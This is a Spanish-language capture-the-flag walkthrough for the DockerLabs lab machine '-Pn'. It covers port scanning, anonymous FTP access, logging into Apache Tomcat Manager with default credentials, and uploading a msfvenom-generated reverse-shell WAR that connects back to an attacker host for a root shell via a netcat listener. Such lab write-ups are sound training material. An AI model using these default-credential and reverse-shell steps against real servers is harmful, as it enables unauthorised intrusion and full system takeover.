> For the complete documentation index, see [llms.txt](https://brias.gitbook.io/brias/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://brias.gitbook.io/brias/dockerlabs/dificultad-facil/pn.md).

# -Pn

### **Despliegue de la Máquina:**

#### **1. Descarga:**

Accedemos a la web oficial de [DockerLabs](https://dockerlabs.es/), buscamos la máquina **-Pn** y pulsamos el botón de descarga.

Esto nos redirige a un enlace de Mega, desde donde descargamos un archivo comprimido que incluye tanto la imagen de la máquina como el script necesario para su ejecución.

#### **2. Descompresión:**

Utilizamos la herramienta `7z` para extraer el contenido del archivo comprimido `Pn.zip`:

```bash
7z x Pn.zip
```

<figure><img src="/files/JkgvSqkfy6wPFCCzfXEx" alt=""><figcaption></figcaption></figure>

#### **3. Ejecución:**

Ejecutamos el script `auto_deploy.sh` para levantar la máquina en Docker, pasando como argumento el archivo `pn.tar`:

```bash
bash auto_deploy.sh pn.tar
```

<figure><img src="/files/9BxCAXvSc3ONDd5CPVP2" alt=""><figcaption></figcaption></figure>

***

### **Reconocimiento:**

#### **1. Verificación de Conectividad:**

Realizamos un `ping` a la dirección IP de la máquina (`172.17.0.2`) para confirmar que está activa:

```bash
ping -c 1 172.17.0.2
```

<figure><img src="/files/Rj5sCVhT2B3epl9MEiuZ" alt=""><figcaption></figcaption></figure>

#### **2. Escaneo de Puertos:**

Realizamos un escaneo rápido con `nmap` para identificar puertos abiertos:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
```

**Explicación de los parámetros:**

* `-p-`: Escanea todos los puertos TCP, del 1 al 65535.
* `--open`: Muestra solo los puertos que están abiertos, omitiendo los cerrados o filtrados.
* `-sS`: Realiza un escaneo SYN (stealth scan) que no completa la conexión TCP.
* `--min-rate 5000`: Fuerza una velocidad mínima de 5000 paquetes por segundo, acelerando el escaneo.
* `-vvv`: Activa el nivel máximo de verbosidad, mostrando información detallada del proceso.
* `-n`: Evita la resolución DNS, usando solo direcciones IP.
* `-Pn`: Omite la detección de host activo, asumiendo que el host está disponible.
* `-oG allPorts`: Guarda los resultados del escaneo en formato grepable, en el archivo `allPorts`.

**Resultados del escaneo:**

* **Puerto 21:** `FTP`.
* **Puerto 8080:** `HTTP`.

<figure><img src="/files/r6LYa2DYE1a0WIpHuBGt" alt=""><figcaption></figcaption></figure>

#### **3. Escaneo Detallado:**

Realizamos un escaneo más exhaustivo para obtener información adicional sobre los puertos abiertos:

```bash
nmap -p21,8080 -sCV 172.17.0.2 -oN targeted
```

**Explicación de los parámetros:**

* `-p21,8080`: Especifica los puertos a escanear.
* `-sCV`: Combina la ejecución de scripts básicos de reconocimiento (`-sC`) con el escaneo de versiones (`-sV`).
* `-oN targeted`: Guarda los resultados del escaneo en formato normal, en el archivo `targeted`.

**Resultados del escaneo:**

* **Puerto 21:** `vsftpd 3.0.5`, con acceso anónimo habilitado y la existencia de un archivo llamado `tomcat.txt`.
* **Puerto 8080:** `Apache Tomcat 9.0.88`.

<figure><img src="/files/5wUhfxt1CVJ90TrnxjdU" alt=""><figcaption></figcaption></figure>

#### **4. Análisis del Servicio FTP:**

Accedemos al servicio FTP con el usuario `anonymous` para descargar el archivo `tomcat.txt`:

```bash
ftp anonymous@172.17.0.2
```

<figure><img src="/files/7jwdnEe2YUGVFODlQhQl" alt=""><figcaption></figcaption></figure>

Listamos los archivos disponibles:

```bash
ls
```

Como podemos comprobar, si existe el archivo `tomcat.txt`.

<figure><img src="/files/t6Fh4pc7gyp8MtUjUMGv" alt=""><figcaption></figcaption></figure>

Descargamos el archivo `tomcat.txt`:

```bash
get tomcat.txt
```

<figure><img src="/files/oNRTol0I9WuRsIbfDx4T" alt=""><figcaption></figcaption></figure>

Inspeccionamos su contenido:

```bash
cat tomcat.txt
```

**El mensaje encontrado es:** `Hello tomcat, can you configure the tomcat server? I lost the password...`.

<figure><img src="/files/CdVQfjHYXR8oLmUOuN1k" alt=""><figcaption></figcaption></figure>

#### **5. Análisis del Servicio Web:**

Accedemos al servicio HTTP en el puerto 8080 desde el navegador: `http://172.17.0.2:8080/`.

<figure><img src="/files/U5oasX5Bolyonm1oPJDI" alt=""><figcaption></figcaption></figure>

Intentamos acceder al panel de administración (`Manager App`), pero se nos solicitan credenciales.

<figure><img src="/files/wQcgRdYk6b1wU5C4aDZ9" alt=""><figcaption></figcaption></figure>

***

### **Explotación:**

#### **1. Búsqueda de Credenciales por Defecto:**

Consultamos la documentación de [HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/tomcat/index.html) para identificar credenciales por defecto de Apache Tomcat.

<figure><img src="/files/cd59PMLOwl2kEmp5bjIF" alt=""><figcaption></figcaption></figure>

Probamos varias combinaciones y encontramos que las credenciales `tomcat:s3cr3t` permiten el acceso al panel de administración.

<figure><img src="/files/K0TDAbQehuW9ltEJMm3Y" alt=""><figcaption></figcaption></figure>

#### **2. Subida de Archivo WAR Malicioso:**

Dentro del panel de administración, localizamos la sección **WAR file to deploy**, que permite la subida de archivos WAR para desplegar aplicaciones.

<figure><img src="/files/JKopccY0jBdLS1kjgOXN" alt=""><figcaption></figcaption></figure>

Generamos una reverse shell en formato WAR utilizando `msfvenom`:

```bash
msfvenom -p java/shell_reverse_tcp LHOST=100.100.100.4 LPORT=123 -f war -o shell.war
```

<figure><img src="/files/dJ6Jb99RSKDw6I6cpb2Y" alt=""><figcaption></figcaption></figure>

Subimos el archivo desde el panel de Tomcat.

<figure><img src="/files/wU0gdSQwTaYaffG8BOy3" alt=""><figcaption></figcaption></figure>

#### **3. Ejecución de la Reverse Shell:**

Nos ponemos en escucha en el puerto especificado (`123`) utilizando `netcat`:

```bash
nc -lvnp 123
```

<figure><img src="/files/2wbwFBX28YWjW0gq3cKB" alt=""><figcaption></figcaption></figure>

Accedemos al archivo WAR desde el navegador para activar la reverse shell.

<figure><img src="/files/ZPSfqvybrwfo4rkXD9xL" alt=""><figcaption></figcaption></figure>

La página web queda en carga indefinida, pero recibimos una conexión reversa en nuestra terminal, obteniendo acceso al sistema como el usuario `root`.

<figure><img src="/files/nt1aLnMHG0L6s1J1naK3" alt=""><figcaption></figcaption></figure>
